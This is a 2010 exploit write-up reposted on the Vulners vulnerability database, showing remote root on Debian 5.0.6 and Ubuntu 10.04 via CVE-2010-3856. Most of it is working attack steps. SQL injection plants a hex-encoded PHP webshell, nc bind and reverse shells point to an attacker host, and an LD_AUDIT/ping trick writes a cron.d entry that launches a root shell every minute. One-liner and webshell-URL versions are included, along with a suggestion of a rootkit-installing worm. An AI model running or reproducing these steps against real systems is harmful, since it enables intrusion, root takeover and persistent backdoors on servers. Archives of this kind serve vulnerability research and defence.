Vulners
Lucene search
Debian 5.0.6 / Ubuntu 10.04 Webshell To Remote Root
10
`# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 24-10-2010
# Author: jmit
# Mail: fhausberger[at]gmail[dot]com
# Tested on: Debian 5.0.6
# CVE: CVE-2010-3856
--------------
| DISCLAIMER |
--------------
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
---------
| ABOUT |
---------
Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).
See (http://www.exploit-db.com/exploits/15304/). Should work on other linux
distros too.
--------------
| BACKGROUND |
--------------
Typically it isn't possible to use a suidshell or modify /etc/passwd directly after
webshell access (user nobody) to gain root access. But with the DSO vuln we can
launch commands as root and we can create a socket and connect to the user or setup
a bindshell.
-----------
| EXPLOIT |
-----------
After you have found a SQL-Injection vuln you can create a php backdoor. This is typically
possible with select into dumpfile/outfile statement. The values are a simple
<? passthru($_GET['c']); ?> backdoor.
---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` (
`fm` longblob
) TYPE=MyISAM;
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';
drop table fm;
flush logs;
---
Now you can connect to the server and create a connection with telnet, nc, write
binary with perl -e ' print "\x41\x42\x43\x44"', echo -en '\x41\x42\x43\x44', ...
If direct shell access isn't possible you can use phpcode to create your own
binary with php fwrite:
---
<?php $File = "/tmp/nc";
$Handle = fopen($File, 'w');
$Data = "\x41\x42\x43\x44";
fwrite($Handle, $Data);
fclose($Handle); ?>
---
Now use
Bind-Shell: http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash
in your webbrowser and connect to your shell
$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
---
Now lets exploit the DSO vuln. You need umask 0 for correct
rw-rw-rw creation of exploit /etc/cron.d/exploit
$ umask 0
This is the shellscript for the cron.d entry.
Bind-Shell: $ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
Reverse-Shell: $ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh
Now make your shellscript executable for cron:
$ chmod u+x /tmp/exploit.sh
Create rw-rw-rw file in cron directory using the setuid ping program:
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Launch every minute a suid root shell
$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
Now you have a root shell every minute.
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)
-------------------
| EXPLOIT oneline |
-------------------
echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)
------------------------------
| EXPLOIT from webshell only |
------------------------------
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)
---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------
http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)
---------
| IDEAS |
---------
Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs.
Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2010 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.09454